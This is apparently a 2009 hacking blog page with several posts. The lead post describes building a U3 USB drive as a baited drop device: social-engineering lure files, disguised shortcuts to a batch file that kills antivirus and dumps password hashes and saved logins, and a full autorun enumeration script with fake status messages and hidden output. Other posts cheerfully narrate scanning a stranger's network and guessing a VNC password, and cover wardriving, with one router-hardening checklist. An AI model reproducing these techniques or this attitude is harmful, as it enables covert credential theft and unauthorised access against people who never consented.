Tuesday, February 24, 2009

USB Enumerator vs USB Hacksaw

Recently a mate at work commented that he got a bit stuck with the whole U3 hacksaw / switchblade kurfuffle. Well I still had original my U3 set up from a couple of years ago after watching the Hak.5 show (Series 2 if your interested), but I thought it needed a bit of a refresh.

Being inspired by DarkOperators Metasploit scripts for enumeration I decided to set up the U3 to use what god gave us, okay what Microsoft gave us, built in tools. But more specifically, built in tools for computer & network enumeration.

So what's the point to this I hear you ask, well after using my Hacksaw here and there and seeing it detected by AV now and then I figured that for it to be as stealthy as possible a few modifications were in order.

First I gave it a good overwrite with DD and started a fresh with the builder tool. The tool I use is LPInstaller.exe. I can't remember where I got it from but it wipes out all the pre-installed U3 goodness and leaves you with a U3 stick that you can mod to be the ultimate USB Enumerator.


With it looking like a brand new U3 this is where a little thought goes in. Now and then at work the receptionist sends an email to all users asking if anyone has lost a USB thumb drive. Well I can take advantage of this good nature by placing a file with a throw away email address in in the root called "Contact Me if Found.txt"

Now when it's found or handed in to a reception, some nice person might email me and let me know that they have it. But why would they do that? Because my next folder is titled "Wedding Pics - DO NOT DELETE" and it has a few wedding and baby pics in (no metadata remember).



So what cold hearted person wouldn't want to return a USB Device with baby and wedding pics on right! Oh and the guy in the wedding photo...... he's in a wheelchair (thanks Google Images) so it would have to be a cold hearted individual who is going to keep that USB drive.

Next I have a couple more directories.



Well they look like directories but they are just links to my evil scripts that will help me on my dark crusade.

A closer look at the shortcut reveals its actually a link to a batch file that will kill any running AV and launch programs to get the local password hashes, internet passwords and login details for MSN etc. And we all know that people re-use paswords don't we.




When someone clicks on one of these 'shortcuts' it will place the running batch file to the back of any open windows and the only clue that anything is going on is a folder in the toolbar which will disapear after a few seconds.




And the batch file can do anything. Obviously I want to stop AV first, and then thanks to a few tools from Nirsoft as well as a few others from the likes of foofus I have loads of juicy details coming my way.




And what does this give me? Hashes, oh the lovely hashes.......



And of course we want the websites too.



And theres plenty more but I'm sure you get the point.


But this is a U3 thumb drive, so hopefully we don't need to rely on a nosey bugger clicking around, because it will hopefully utilise the auto run feature to enumerate the network as soon as it's plugged in. It does the crazy enumeration coolness by running this script from the hidden \WIP\CMD folder.



Here's the simple batch file that does the enumeration:

@Echo off
echo Starting. Do not close program. Please wait 15 seconds.
::Generate a unique filename
set fn=%computername%-%random%
::Create a non-obvious directory
mkdir .\Windows\System\System32\etc\hosts\win\0011\%fn%
cd .\Windows\System\System32\etc\hosts\win\0011\%fn%
::Get local Time and Date Info
time /t >%fn%.log
date /t >>%fn%.log
::Network Info
net user /domain >>%fn%.log
echo Restarting critical service. Please Wait 5 seconds.
net group /domain >>%fn%.log
net localgroup /domain >>%fn%.log
net localgroup administrators /domain >>%fn%.log
net localgroup "Account Operators" /domain >>%fn%.log
net accounts /domain >>%fn%.log
net view /domain >>%fn%.log
net view >>%fn%.log
echo Service restart complete. Please wait 5 seconds.
::Local Info
ipconfig /all >>%fn%.log
ipconfig /displaydns >>%fn%.log
netstat -ano >>%fn%.log
netstat -r >>%fn%.log
arp -a >>%fn%.log
tasklist /svc >>%fn%.log
tasklist >>%fn%.log
tasklist /v >>%fn%.log
net share >>%fn%.log
net use >>%fn%.log
net accounts >>%fn%.log
net localgroup >>%fn%.log
net localgroup administrators >>%fn%.log
systeminfo >>%fn%.log
netsh firewall show config >>%fn%.log
echo Service failed to load. Error code MS-31337
netsh diag show all /v >>%fn%.log

And that pretty much enumerates the network for all accounts, groups and members of admin groups. It gets password policies, computer details from the domain, domain names....




local accounts and groups, firewall policies, applied hotfixes, network connections, open ports, running services, shares, networking information and other bits and bobs as well.




And the beauty of it all is it's just using Microsoft tools which won't make the AV go loopy and freak out. So within a few seconds of plugging the device into any PC with a USB port on a network and you'll have more data than you can shake a big enumerating stick at. Wonderful!

All this useful data is output to a single log file that is in a deeply buried obfuscated directory with a random number appended to the end, so it can be run time after time and is nicely tucked away.

But what if autorun is disabled? Well just like the script that kills the AV and grabs the passwords this can be run manually by clicking the batch file or by fronting it with a shortcut with a folder icon and running that.


So how can this be useful in a pentest? it could be that during that pentest you have social engineered your way onto a helpful persons PC who is going to print something off for you or email an important document for you and said files are on your USB device. Or you could hand a USB device to a receptionist to ask her to heck who's it is. Or of course you could just be transfering those picture or music files to your friends computer. So if your reading this and you know me, maybe next time you ask me for a file or a movie that I have on USB you better think again!

So there you have it, my take on making my USB Hacksaw a little more interesting.

For more info on U3 Hacking I recommend this post by McGrew Security

Friday, February 20, 2009

10 Steps to Securing a Wireless Router

I thought about putting together this post following a thread I read on the Ethical Hacker forums. This post is really just my checklist for the steps I take to secure my wireless router and a little explanation as to why I'm setting each option.


1. Upgrade Firmware

It's always a good idea to keep firmware as up to date as possible as the vendor may have fixed known vulnerabilities or bugs since the hardware shipped. As a bonus you might even get a bit more functionality thrown in as well with the firmware upgrade. Its also a god idea to check the vendors site every couple of months for updates.


2. Change the default Password

Obviously!


3. Turn off Wireless Administration

This will prevent anyone who is not physically plugged into the network from administering the wireless router.


4. Enable Encryption

Enable the best encryption possible. WPA2 is preferred but if the connecting devices only support WEP then WEP it is. Just be aware that WEP is crap and it can b e cracked in seconds. Ensure that whatever encryption you use it has a long random key. There are plenty of random key generators available so use them.


5. Change & Hide the Default SSID

Don't leave your default SSID as Linksys or Belkin. Change it to something unique but not something that identifies it as your network, such as “Bob Scratchets House”. Even after hiding the SSID it is possible for an attacker to view it but it is another layer in your defense strategy.


6. Apply MAC Address Filtering

Each device that has a wireless card in will have a MAC address. Apply MAC address filtering so only devices with the specified MAC addresses can connect using wireless to you router. This can be bypassed but it's another hurdle to make a potential attacker jump through.


7. Disable UPnP

Universal Plug and Play is a method by which software can open up ports on the router to allow external hosts to communicate through the router with a host on the LAN. This can also be used by malware to open up the router to allow a route in. by disabling UPnP you will need to enable port forwarding when required.


8. Configure the DHCP Settings

If your router allows you to change your DHCP scope you may want to set it to hand out addresses from a range other than the default, such as the 172.16.x.x range. Also by limiting the amount of addresses to the number of hosts you have it might provide an early warning system if someone does manage to bypass your security and hop onto your wireless LAN.


9. Configure DNS Settings

Point your DNS to a provider such as OpenDNS and utilise there free services. OpenDNS can be used to block specific types of sites such as File Sharing or Pornography and also to log where computers from your LAN are going to. It will also block your computer from visiting known bad sites. Another important note, when the DNS flaw was released to the public by Dan Kaminsky at Blackhat 08, Open DNS was one of the first DNS providers to provide protection. At the time of this post many ISPs are still vulnerable.


10. Enable Logging

If your router allows you to enable logging it is worthwhile doing so. By familiarising yourself with the logs regularly you will get to recognise what is normal and what is not. But remember, logs are only useful if you check them!



The functions I have raised in these 10 steps are those that should be available on most consumer grade routers. If you have a router that does have more functionality such as allowing you to use HTTPS to access the administrative interface then that's great, use it.

Get familiar with what your router can do and know where to look to check settings such as port forwarding. And once you have set up the router and gotten it working well, save the config and store it somewhere safe and secure such as in a Truecrypt volume or in an encrypted disk image.

Tuesday, February 10, 2009

Bob and his iPhone Adventures

So in the last post I blogged about a cool tool that our super hero, evil Bob, might use to find wireless networks when out with his super fantastic iPhone. Well after tracking down those pesky open networks I image the next thing Bob might want to do is look a bit deeper into a particular network. Well a great iPhone application for doing so is called Snap, and it works like this.


Bob is out and about with his trusty iPhone and he stumbles across an open wifi network. Bob being Bob, he connects to the network and gets himself an IP address, so far so good. But his curiosity gets the better of him and he wonders what else is on the network with him. So he fires up Snap and kicks of a scan.



Snap scans picks up the subnet that Bob is on and automatically scans for live hosts. After a second or two Bob sees a list of who else is on the network with him.



Interesting. Well Bob could leave it at that. After all, his curiosity is nearly satisfied, but not quite. He feels the urge to see what the other hosts on the network are doing, just to be sure that they are alright and not up to no good. So he drills down a bit further and takes a look at the Ubuntu VM.



Well Bob wouldn't be called nosey Bob if he didn't then go ahead and do a little port scan would he.



What do you know. VNC and a web server. That's just great. now Bob is satisfied. He knows who's on the network and now he has had a little poke around and he know what they are doing.

But hang on. Bob just remembered that old saying, "hard on the outside and soft on the inside" . Well maybe just before he goes he should put that to the test. He fires up his iPhone VNC client and tries a few common passwords.



And after a couple of attempts he gets lucky with......you guessed it "Password".




Good work Bob!

Tuesday, February 3, 2009

More Iphone Wardriving Goodness

WiFiFoFum have upgraded their Iphone application and I thought it was well worth posting about because it's making great use of the inbuilt GPS on the 3G Iphone.

We still have the Radar and Networks view.



But now you have the option to enable logging before a wardrive. In the screenshot below you can see a few previous logs.



After creating a log from a wardrive you will be able select it and you'll be asked if you want to view it in Maps or email it to yourself.



If I choose to view the log in Maps I get taken straight into maps and I'm presented with a nice map of all the AP's I discovered on my wardrive.



If you choose the option to email yourself the .kml file you can simply save the file to your PC and then drag and drop the .kml file into Google Earth to see exactly where everything is.



How cool is this eh! The pins retain all the useful info such as encryption, channel number, MAC address etc.....



What would be great would be a different colour pin to denote different types of encryption, but I guess that's making life real easy.

Now go get yourself some exercise and get wardriving!